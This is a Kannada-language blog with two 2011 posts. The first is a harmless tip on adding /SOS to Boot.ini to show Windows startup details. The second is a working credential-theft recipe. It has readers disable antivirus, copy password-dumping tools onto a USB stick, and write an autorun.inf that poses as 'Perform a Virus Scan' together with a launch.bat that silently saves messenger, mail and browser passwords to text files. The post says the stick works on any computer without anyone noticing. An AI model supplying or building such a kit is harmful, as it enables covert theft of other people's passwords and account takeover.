ಶನಿವಾರ, ಜನವರಿ 22, 2011

ನಿಮ್ಮ ಕಂಪ್ಯೂಟರ್ ಶುರು ಮಾಡುವಾಗ ತೊಂದರೆ ನೀಡುತ್ತಿದೆಯೆ????????????????????

                            ನಿಮ್ಮ ಕಂಪ್ಯೂಟರ್ ಆನ್ ಮಾಡಿದಾಗ ಏನಾದರು ತೊಂದರೆಗಳಿವೆಯೆ? ಅಥವಾ ನೀವು ನಿಮ್ಮ ಕಂಪ್ಯೂಟರ್ ಆನ್ ಮಾಡಿದಾಗ ಬರುವ ವಿಂಡೋಸ್ ಲೋಗೊ ಹಿಂದೆ ಏನು ನಡೆಯುತ್ತಿದೆ ಎಂದು ತಿಳಿಯಬೇಕೆ? ಹಾಗಾದರೆ ಇಲ್ಲಿದೆ ಉಪಾಯ.

ಈ ಕೆಳಗಿನ ವಿಧಾನಗಳನ್ನು ಅನುಸರಿಸಿ
1. "System Properties" ಡೈಲಾಗ್ ಬಾಕ್ಸ್ ಅನ್ನು ತೆರೆಯಿರಿ (START>SETTINGS>CONTROL         PANEL>SYSTEM)2.ಅಲ್ಲಿ "Advanced" tab ಮೇಲೆ ಕ್ಲಿಕ್ ಮಾಡಿರಿ, ಮತ್ತು "Startup And Recovery" ಭಾಗದಲ್ಲಿರುವ "ಸೆಟ್ಟಿಂಗ್ಸ್" ಬಟನ್ ಮೇಲೆ ಕ್ಲಿಕ್ ಮಾಡಿರಿ.3.ಈಗ "Startup And Recovery" ಡೈಲಾಗ್ ಬಾಕ್ಸ್ ತೆರೆದುಕೊಳ್ಳುತ್ತದೆ. ಅಲ್ಲಿ "System Startup" ಎಂಬುದರ ಮುಂದಿರುವ "Edit" ಬಟನ್ ಮೇಲೆ ಕ್ಲಿಕ್ಕಿಸಿ.


4.ಅದನ್ನು ಕ್ಲಿಕ್ಕಿಸಿದಾಗ "Boot.ini "ಎಂಬ ಕಡತವೊಂದು ನೋಟ್ ಪ್ಯಾಡ್ ನಲ್ಲಿ ತೆರೆದುಕೊಳ್ಳುತ್ತದೆ. ಅದರಲ್ಲಿ "/fastdetect" ಎಂದಿರುವ ಲೈನಿನ ಕೊನೆಯ ಭಾಗಕ್ಕೆ ಹೋಗಿ ಮತ್ತು ಅಲ್ಲಿ ಸ್ಪೇಸ್ ಬಾರ್ ಅನ್ನು ಒಮ್ಮೆ ಒತ್ತಿ ಮತ್ತು    /SOS    ಎಂದು ಸೇರಿಸಿ.
5.  ಈಗ Boot.ini ಉಳಿಸಿ(ಸೇವ್ ಮಾಡಿ).
6.ಈಗ "Startup And Recovery" ಮತ್ತು "System Properties" ನಲ್ಲಿ ಇರುವ OK ಬಟನ್ ಮೇಲೆ ಕ್ಲಿಕ್ ಮಾಡಿ.
7.ಈಗ ಇದರ ಫಲಿತಾಂಶವನ್ನು ನೋಡಲು ನಿಮ್ಮ ಕಂಪ್ಯೂಟರ್ ಅನ್ನು ರಿಸ್ಟಾರ್ಟ್ ಮಾಡಿರಿ.

                 ಒಮ್ಮೆ ನಿಮ್ಮ ಕಂಪ್ಯೂಟರ್ ಅನ್ನು ರಿಸ್ಟಾರ್ಟ್ ಮಾಡಾದ ಮೇಲೆ ಲೋಡಿಂಗ್ ಸ್ಕ್ರೀನ್ ಬದಲು ಸಿಸ್ಟಮ್ ಆಪರೇಷನ್ ಗಳನ್ನು ನೀವು ನೋಡಬಹುದು.
ಮತ್ತೆ ಆ ಲೋಡ್ ಸ್ಕ್ರೀನ್ ಗಾಗಿ ಮೇಲಿನ ವಿಧಾನವನ್ನೇ ಪಾಲಿಸಿ "/SOS" ಅನ್ನು ತೆಗೆದು ಹಾಕಿರಿ.

ಮಂಗಳವಾರ, ಜನವರಿ 18, 2011

ಪೆನ್ ಡ್ರೈವ್ ಮೂಲಕ ಪಾಸ್ ವರ್ಡ್ ತೆಗೆಯಿರಿ

ವಿ.ಸೂ:ಇದು ಕೇವಲ ಕಲಿಯಲು ಮಾತ್ರ. ಯಾವುದೇ ದುರ್ಬಳಕೆಗೂ ನಾವು ಜವಬ್ದಾರರಲ್ಲ..
                    
                    ನಮಗೆಲ್ಲರಿಗೂ ಗೊತ್ತಿರುವ ಹಾಗೆ ವಿಂಡೋಸ್ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ ನಮ್ಮ ಕೆಲವು ಮೆಸೆಂಜರ್ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ಮತ್ತು ಔಟ್ ಲುಕ್ ಎಕ್ಸ್ ಪ್ರೆಸ್, SMTP, POP, FTP ಖಾತೆಗಳ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ತನ್ನಲ್ಲೇ ಉಳಿಸಿಕೊಳ್ಳುತ್ತದೆ.

                 ಇವುಗಳನ್ನು ಪಡೆದುಕೊಳ್ಳಲು ಅನೇಕ ಸಾಫ್ಟ್ ವೇರ್ ಗಳಿವೆ. ಇವುಗಳಲ್ಲಿ ಕೆಲವನ್ನು ಮತ್ತು ನಿಮ್ಮ ಪೆನ್ ಡ್ರೈವ್ ಅನ್ನು ಉಪಯೋಗಿಸಿಕೊಂಡು ನಿಮ್ಮದೇ ಒಂದು  rootkit  ಅನ್ನು ತಯಾರಿಸಿ ಅಡಗಿರುವ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ತೆಗೆಯಬಹುದು.

 Rootkit ಅನ್ನು ತಯಾರಿಸಲು ಕೆಳಗಿನ ಸಾಫ್ಟ್ ವೇರ್ ಗಳು ಬೇಕಾಗುತ್ತವೆ
MessenPass: ಇದು ಕೆಲವು ಪ್ರಮುಖ ಮತ್ತು ಪ್ರಖ್ಯಾತ ಮೆಸೆಂಜರ್ ಗಳಾದ ಎಂ.ಎಸ್.ಎನ್ ಮೆಸೆಂಜರ್, ಯಾಹೂ ಮೆಸೆಂಜರ್, ವಿಂಡೋಸ್ ಮೆಸೆಂಜರ್, ಐ.ಸಿ.ಕ್ಯು ಲೈವ್, ಎ.ಒ.ಎಲ್ ಇನ್ ಸ್ಟಾಂಟ್, ಟ್ರಿಲಿಯನ್, ಮಿರಾಂಡ ಮತ್ತು ಜಿ.ಐ.ಎ.ಎಮ್ ಇವುಗಳ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ತೆಗೆಯುತ್ತದೆ.

Mail PassView: ಇದು ಔಟ್ ಲುಕ್ ಎಕ್ಸ್ ಪ್ರೆಸ್, ಮೈಕ್ರೊಸಾಫ್ಟ್ ಔಟ್ ಲುಕ್, ಇನ್ ಕ್ರೆಡಿ ಮೈಲ್, ಯುಡೆರಾ, ನೆಟ್ ಸ್ಕೇಪ್ ಮೈಲ್, ಮೊಜಿಲಾ ತಂಡರ್ ಬರ್ಡ್, ಗ್ರೂಪ್ ಮೈಲ್ ಫ್ರೀ ಇವುಗಳ ಹಾಗೂ ವೆಬ್ ಬೇಸ್ಡ್ ಇ-ಮೈಲ್ ಖಾತೆಗಳ ಸಂಬಂಧಿತ ಜಿ-ಟಾಲ್ಕ್, ಯಾಹೂ ಮೈಲ್ ಗಳನ್ನು ಉಪಯೋಗಿಸುತ್ತಿದ್ದರೆ ಅವುಗಳ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ತೆಗೆಯುತ್ತದೆ.

IE Passview:  ಇದು ನಿಮ್ಮ ಇಂಟರ್ನೆಟ್ ಎಕ್ಸ್ ಪ್ಲೋರರ್ ಬ್ರೌಸರ್ ಉಳಿಸಿಕೊಂಡಿರುವ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ತೆಗೆಯುತ್ತದೆ.

Protected Storage PassView: ಇದು ರಕ್ಷಣಾ ಸಂಗ್ರಹದಲ್ಲಿರುವ ಪಾಸ್ ವರ್ಡ್ ಗಳು ಮತ್ತು ಪಾಸ್ ವರ್ಡ್ ಸಂರಕ್ಷಿತ ವೆಬ್ಸೈಟ್ ಗಳ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ತೆಗೆಯುತ್ತದೆ.

PasswordFox: ಇದು ನಿಮ್ಮ ಮೊಜಿಲಾ ಫೈರ್ ಫಾಕ್ಸ್ ಬ್ರೌಸರ್ ಸಂಗ್ರಹಿಸಿರುವ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ತೆಗೆಯುತ್ತದೆ.

ಈಗ ಇವುಗಳನ್ನು ಕೆಳಗಿನ ರೀತಿಯಲ್ಲಿ ಬಳಾಸಬೇಕು:

ಸೂಚನೆ:ಮೊದಲು ನಿಮ್ಮ antivirus ಅನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿ.

1.ಮೇಲಿನ ಎಲ್ಲಾ ಐದು ಸಾಫ್ಟ್ ವೇರ್ ಗಳನ್ನು ಡೌನ್ ಲೋಡ್ ಮಾಡಿಕೊಳ್ಳಿ. ಅವುಗಳನ್ನು ಎಕ್ಟ್ರಾಕ್ಟ್ ಮಾಡಿ ಮತ್ತು ಅದರಲ್ಲಿನ ಎಕ್ಸಿಕ್ಯೂಟೆಬಲ್ (ಅಂದರೆ mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.ex) ಫೈಲ್ ಗಳನ್ನು ನಿಮ್ಮ ಯು.ಎಸ್.ಬಿ ಪೆನ್ ಡ್ರೈವ್ ಗೆ ನಕಲು ಮಾಡಿಕೊಳ್ಳಿ.

2. ನೋಟ್ ಪ್ಯಾಡ್ ಅನ್ನು ತೆಗೆದು ಅದರಲ್ಲಿ ಕೆಳಗಿರುವುದನ್ನು ಟೈಪ್ ಮಾಡಿ ಅಥವಾ ಇಲ್ಲಿರುವುದನ್ನು ನಕಲಿಸಿ ನೋಟ್ ಪ್ಯಾಡ್ ನಲ್ಲಿ ಅಂಟಿಸಿ

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

ಈ ನೋಟ್ ಪ್ಯಾಡ್ ಕಡತವನ್ನು autorun.inf ಎಂದು ನಿಮ್ಮ ಯು.ಎಸ್.ಬಿ ಪೆನ್ ಡ್ರೈವ್ ನಲ್ಲಿ ಉಳಿಸಿ(save).

3.ಇನ್ನೊಂದು ನೋಟ್ ಪ್ಯಾಡ್ ಅನ್ನು ತೆರೆದು ಅದರಲ್ಲಿ ಕೆಳಗಿನಂತೆ ಟೈಪ್ ಮಾಡಿ ಇಲ್ಲವೆ ನಕಲಿಸಿ ಅಂಟಿಸಿ.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

ಇದನ್ನು launch.bat ಎಂದು ಉಳಿಸಿ.

ಈಗ ನಿಮ್ಮ ರೂಟ್ ಕಿಟ್ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ಹೆಕ್ಕಲು ಸಿದ್ದವಾಗಿದೆ. ನೀವು ಈ ಪೆನ್ ಡ್ರೈವ್ ಅನ್ನು ಯಾವುದೇ ಕಂಪ್ಯೂಟರ್ ನಲ್ಲಿ ಸಂಗ್ರಹವಾಗಿರುವ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ತೆಗೆಯಲು ಉಪಯೋಗಿಸಬಹುದು. ಕೆಳಗಿನ ವಿಧಾನವನ್ನು ಅನುಸರಿಸಿ

1.ನಿಮ್ಮ ಪೆನ್ ಡ್ರೈವ್ ಅನ್ನು ಕಂಪ್ಯೂಟರ್ಗೆ ಸೇರಿಸಿದಾಗ autorun ಅನ್ನುವ ಒಂದು ವಿಂಡೊ ಬರುತ್ತದೆ.(ಏಕೆಂದರೆ ನಾವು autorun ಎಂಬ ಫೈಲ್ ಅನ್ನು ಅದರಲ್ಲಿ ಸೇರಿಸಿದ್ದೇವೆ)
2.ಆ ವಿಂಡೋದಲ್ಲಿ ಮೊದಲನೆಯ ಆಯ್ಕೆಯನ್ನು ಆರಿಸಿಕೊಳ್ಳಿ(Perform a Virus Scan)
3.ಈಗ ನಿಮ್ಮ ರೂಟ್ ಕಿಟ್ ಮತ್ತು ಪೆನ್ ಡ್ರೈವ್ ಆ ಕಂಪ್ಯೂಟರ್ ನಲ್ಲಿ ಆಡಗಿರುವ ಪಾಸ್ ವರ್ಡ್ ಗಳನ್ನು ಯಾರಿಗೂ ಗೊತ್ತಾಗದ ರೀತಿಯಲ್ಲಿ ತೆಗೆಯುತ್ತಿರುತ್ತದೆ. ನಂತರ ಇವು ಟೆಕ್ಸ್ಟ್(.TXT) ಫೈಲ್ ನಲ್ಲಿ ಸಂಗ್ರಹಿಸಿರುತ್ತದೆ.(ಇದು ಕೆಲವು ಸೆಕೆಂಡ್ ಗಳಷ್ಟು ಸಮಯವನ್ನು ತೆಗೆದುಕೊಳ್ಳುತ್ತದೆ.
4.ಈಗ ನಿಮ್ಮ ಪೆನ್ ಡ್ರೈವ್ ನಲ್ಲಿ ಟೆಕ್ಸ್ಟ್ ಫೈಲ್ ಗಳನ್ನು ನೋಡಬಹುದು. ನಂತರ ಪೆನ್ ಡ್ರೈವ್ ಅನ್ನು ತೆಗೆದುಬಿಡಿ.

ಸೂಚನೆ: ಇದು ಕೇವಲ ನಿಮ್ಮ ಕಂಪ್ಯೂಟರ್ ನಲ್ಲಿ ಸಂಗ್ರಹವಾಗಿರುವ ಪಾಸ್ ವರ್ಡ್(ಸಂಬಂಧಿಸಿದ) ಗಳನ್ನು ಮಾತ್ರ ತೆಗೆಯುತ್ತದೆ.